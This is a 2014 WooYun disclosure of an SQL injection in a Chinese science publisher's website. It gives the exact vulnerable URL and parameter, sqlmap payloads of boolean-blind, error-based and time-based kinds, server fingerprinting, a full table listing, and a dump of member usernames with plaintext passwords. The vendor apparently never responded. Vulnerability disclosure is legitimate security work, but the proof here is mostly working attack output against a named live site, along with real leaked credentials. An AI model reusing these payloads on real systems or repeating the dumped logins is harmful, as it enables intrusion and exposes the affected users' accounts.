当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080329

漏洞标题:中国科学出版社SQL注入漏洞可导致数据泄漏

相关厂商:中国科学出版社

漏洞作者: xxsec

提交时间:2014-10-22 11:04

修复时间:2014-12-06 11:06

公开时间:2014-12-06 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

膜拜猪猪侠,求神器,手工党伤不起·······

详细说明:

1注入点:http://www.sciencep.com/t_second.php?id=798 (GET) (主要是t_second.php文件没过滤)
2

sqlmap identified the following injection points with a total of 296 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=798 AND 6024=6024
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] sciencep_db
[*] test


3

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=798 AND 6024=6024
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: sciencep_db
[158 tables]
+-----------------------------+
| 1discountrate               |
| 2order                      |
| 3orderdetail                |
| admininfo                   |
| article_t                   |
| ci_sessions                 |
| classification              |
| column_t                    |
| daorushujibiao              |
| department                  |
| group_list                  |
| hxhd_addon15                |
| hxhd_addonarticle           |
| hxhd_addonflash             |
| hxhd_addonimages            |
| hxhd_addonsoft              |
| hxhd_addonspec              |
| hxhd_admin                  |
| hxhd_admintype              |
| hxhd_arcatt                 |
| hxhd_archives               |
| hxhd_arcrank                |
| hxhd_arctype                |
| hxhd_area                   |
| hxhd_articles               |
| hxhd_banbenshuomingku       |
| hxhd_banciku                |
| hxhd_baseinfo               |
| hxhd_bianjiku               |
| hxhd_bianjishuleiku         |
| hxhd_bianjizhichengku       |
| hxhd_bianjizhiwuku          |
| hxhd_cengciku               |
| hxhd_channeltype            |
| hxhd_chubanzheku            |
| hxhd_co_dataswitch          |
| hxhd_co_exrule              |
| hxhd_co_listenurl           |
| hxhd_co_mediaurl            |
| hxhd_congshuku              |
| hxhd_conote                 |
| hxhd_courl                  |
| hxhd_dianjipaihangbang      |
| hxhd_dianxiaofenlei         |
| hxhd_dianxiaoleibie         |
| hxhd_dianxiaopaihangbang    |
| hxhd_dianxiaopaihangyiju    |
| hxhd_dingdanku              |
| hxhd_dingweishuomingku      |
| hxhd_download               |
| hxhd_duixiangquntiku        |
| hxhd_duzheduixiangku        |
| hxhd_error                  |
| hxhd_feedback               |
| hxhd_flink                  |
| hxhd_flinktype              |
| hxhd_freelist               |
| hxhd_friend                 |
| hxhd_goushuhuiyuanku        |
| hxhd_goushujingli           |
| hxhd_guanlifenzuku          |
| hxhd_guestbook              |
| hxhd_homepageset            |
| hxhd_huiyuanjibieku         |
| hxhd_huojiangku             |
| hxhd_jgkinfo                |
| hxhd_jiangxiangku           |
| hxhd_jiaoshihuiyuanku       |
| hxhd_jiaoshijibie           |
| hxhd_jiaoshikuxueke         |
| hxhd_jiaoshizhichengku      |
| hxhd_jiaoyuchengduku        |
| hxhd_jibenxinxi             |
| hxhd_jigouku                |
| hxhd_jingxiaoshangku        |
| hxhd_jxkbook                |
| hxhd_kaibenku               |
| hxhd_kechengxingzhi         |
| hxhd_keywords               |
| hxhd_leader_t               |
| hxhd_log                    |
| hxhd_member                 |
| hxhd_member_arctype         |
| hxhd_member_flink           |
| hxhd_member_guestbook       |
| hxhd_member_operation       |
| hxhd_member_time            |
| hxhd_member_type            |
| hxhd_memberstow             |
| hxhd_moneycard_record       |
| hxhd_moneycard_type         |
| hxhd_moneyrecord            |
| hxhd_myad                   |
| hxhd_mynews                 |
| hxhd_mytag                  |
| hxhd_partner                |
| hxhd_pinzhongleixing        |
| hxhd_plus                   |
| hxhd_positions              |
| hxhd_quickgo                |
| hxhd_readerliuyan           |
| hxhd_recruitments           |
| hxhd_search_keywords        |
| hxhd_sgpage                 |
| hxhd_shangbangzuigaoweiciku |
| hxhd_shenfenku              |
| hxhd_shengfenku             |
| hxhd_shiyueyangshuyuanyin   |
| hxhd_shopsales              |
| hxhd_shoukexinxi            |
| hxhd_shuleiku               |
| hxhd_shupingku              |
| hxhd_softconfig             |
| hxhd_sysconfig              |
| hxhd_syspassport            |
| hxhd_tishiwentiku           |
| hxhd_tougaoku               |
| hxhd_uploads                |
| hxhd_vote                   |
| hxhd_xianxuanjiaocaiyuanyin |
| hxhd_xiazaiku               |
| hxhd_xiazaileixingku        |
| hxhd_xuekeku                |
| hxhd_xueliku                |
| hxhd_yizhezerenshuomingku   |
| hxhd_yuanbanciku            |
| hxhd_zaitixingtaiku         |
| hxhd_zdxmjd                 |
| hxhd_zengyangshuku          |
| hxhd_zhengwenyuzhongku      |
| hxhd_zhichengku             |
| hxhd_zhiwuku                |
| hxhd_zhongdaxianmu          |
| hxhd_zhongtufafenlei        |
| hxhd_zhuangzhenku           |
| hxhd_zhuyifangshiku         |
| hxhd_zidingyifenlei         |
| hxhd_zuoyizheku             |
| hxhd_zuozhezerenshuomingku  |
| iso_bookinfo_t              |
| iso_booktype_t              |
| log_book                    |
| mail_group                  |
| mail_list                   |
| mail_template               |
| mpshop_tongbu               |
| phpqadmin                   |
| phpqanswer                  |
| phpqquestion                |
| phpqsession                 |
| phpqsurvey                  |
| phpquser                    |
| remit                       |
| sendfee                     |
| shouyechangxiaotushubiao    |
| shouyexianshibiao           |
| udf_temp                    |
| user_t                      |
+-----------------------------+


4

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=798 AND 6024=6024
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: sciencep_db
Table: hxhd_member
[19 entries]
+----------------+-----------+
| pwd            | uname     |
+----------------+-----------+
| 102030         | asdf1234  |
| 111            | das       |
| 111            | hfkjsdhkj |
| 111111         | 1212313   |
| 123456         | qwdsa     |
| 123456         | 1234441   |
| 1310530        | dsfdsf    |
| 1310530        | dsffd     |
| aaa            | aaa       |
| aaaaaa         | aassas    |
| aaaaaa         | dssdssds  |
| fengzi         | jfsldk    |
| fengzi         | jfdksl    |
| fengzi         | dfsjkl    |
| hahaha         | ga        |
| hahaha         | haha      |
| ttttianttttian | ttttian   |
| wltcyb         | aaa       |
| zcx            | zcx       |
+----------------+-----------+

修复方案:

过滤

版权声明:转载请注明来源 xxsec@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论